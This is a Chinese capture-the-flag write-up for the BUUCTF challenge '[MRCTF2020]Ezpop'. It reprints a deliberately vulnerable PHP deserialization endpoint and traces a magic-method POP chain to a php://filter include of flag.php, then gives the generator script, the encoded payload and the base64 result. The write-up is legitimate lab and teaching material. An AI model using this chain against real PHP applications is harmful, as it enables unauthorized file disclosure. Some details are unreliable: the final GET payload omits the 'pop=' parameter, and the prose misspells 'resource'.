当前位置: 代码迷 >> 综合 >> BUUCTF [MRCTF2020]Ezpop
  详细解决方案

BUUCTF [MRCTF2020]Ezpop

热度:24   发布时间:2023-11-24 20:42:43.0

BUUCTF [MRCTF2020]Ezpop

题目

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;public function append($value){
    include($value);}public function __invoke(){
    //在类的对象被调用为函数时候,自动被调用$this->append($this->var);}
}class Show{
    public $source;public $str;public function __construct($file='index.php'){
    //在类的对象实例化之前,自动被调用$this->source = $file;echo 'Welcome to '.$this->source."<br>";}public function __toString(){
    //在类的对象被当作字符串操作的时候,自动被调用return $this->str->source;}public function __wakeup(){
    //在类的对象反序列化的时候,自动被调用if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
    echo "hacker";$this->source = "index.php";}}
}class Test{
    public $p;public function __construct(){
    //在类的对象实例化之前,自动被调用$this->p = array();}public function __get($key){
    //从不可访问的属性中读取数据会触发$function = $this->p;return $function();}
}if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;highlight_file(__FILE__);
}

代码审计

flag在flag.php中
include($value)文件包含
应该可以执行文件包含flag.php,就要调用append($value)方法
要调用append($value)方法,就需要调用__invoke()魔术方法
接着要想调用__invoke(),那么就需要将Modifier类的对象调用为函数
$var值传给了$value参数,所以要包含flag.php的源码,就是给$var传入php://filter/read=convert.base64-encode/recource=flag.php

在Test类中有两个魔法函数__construct和__get,需要关注魔法函数__get。魔法函数__get中设置了属性p会被当做函数调用,刚好符合前面Modifier类中的要求

Show类中有三个魔术方法,__toString中会return属性str中的属性source,但要是source属性不存在,就符合了Test类中的要求,魔术方法__toString在类被当做一个字符串处理时会被自动调用,而__wakeup则将属性source传入正则匹配函数preg_match()中,在这个函数中source属性就被当做字符串处理,匹配一些字符串。__wakeup又在类被反序列化时自动调用。

if(isset($_GET['pop'])){
    //如果GET传参pop,进行反序列化@unserialize($_GET['pop']);
}
else{
    $a=new Show;highlight_file(__FILE__);
}

1.GET传参pop触发反序列化unserialize()

2.unserialize()触发__wakeup()魔术方法

3.__wakeup()通过preg_match()将$this->source做字符串比较,如果$this->source是Show类,触发__toString()魔术方法

4.__toString中的str赋值为一个实例化的Test类,那么其类不含有source属性,所以会触发Test中的__get()魔术方法

5.__get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会触发Modifier类中的__invoke()魔术方法

6.__invoke()调用append方法中的include()进行文件包含,
所以pop应该构造为:
unserialize()–>__wakeup()–>toString()–>__get()–>__invoke()–>append()–>include(flag.php)

那反过来就是

<?php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
    public $source;public $str;
}
class Test{
    public $p;
}
$m=new Modifier();
$s=new Show();
$t=new Test();
$t->p=$m;
$s->str=$t;
$s->source=$s;
echo urlencode(serialize($s));
?>

输出:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D

so payload:

GET:?O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D

得到base64编码的flag.php源码

PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFnezViMDQ3NjJkLWMzNDUtNDEzMi1iYjkzLWQyYTlmNjE2ZDYzNX0iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+
  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.